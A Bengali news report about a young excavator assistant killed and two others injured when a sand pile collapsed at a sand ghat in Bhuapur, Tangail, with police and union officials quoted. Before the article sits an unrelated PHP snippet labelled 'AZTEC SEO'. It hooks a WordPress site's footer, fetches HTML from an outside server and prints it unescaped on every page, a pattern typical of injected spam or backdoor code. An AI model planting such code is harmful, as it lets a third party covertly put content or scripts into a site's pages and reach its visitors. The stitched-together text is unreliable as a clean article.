/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
টাঙ্গাইলের ভূঞাপুরে বালুর স্তূপে চাপা পড়ে এক যুবকের মৃত্যু হয়েছে। নিহতের নাম রাশেদুল ইসলাম (২৫)। এ সময় আহত হয়েছেন আরও দুজন।
শনিবার দিবাগত রাতে নিকরাইল ইউনিয়নের সারপলশিয়া এলাকার বালুর ঘাটে এ ঘটনা ঘটে। আহতদের উদ্ধার করে চিকিৎসার জন্য হাসপাতালে পাঠানো হয়েছে। রাশেদুল উপজেলার পলশিয়া গ্রামের ইসমাইল হোসেনের ছেলে। তিনি মাটিকাটার যন্ত্র ভেকু (এক্সেভেটর) চালকের সহকারী ছিলেন।
নিকরাইল ইউনিয়ন পরিষদের চেয়ারম্যান মাসুদুল হক মাসুদ জানান, ওই এলাকায় অনেক উঁচু বালুর স্তূপ ছিল। তিনজন সেই বালুর স্তূপে পাইপ খুলতে যান। এ সময় বালুর স্তূপ ধসে তাদের ওপর পড়ে। এতে ঘটনাস্থলে একজন মারা যান। আহত দুজনকে হাসপাতালে পাঠানো হয়েছে।
ভূঞাপুর থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) ফরিদুল ইসলাম জানান, আহতদের মধ্যে একজনকে ঢাকার পঙ্গু হাসপাতালে পাঠানো হয়েছে। নিহতের মরদেহ উদ্ধার করে ময়নাতদন্তের জন্য মর্গে পাঠানো হয়েছে।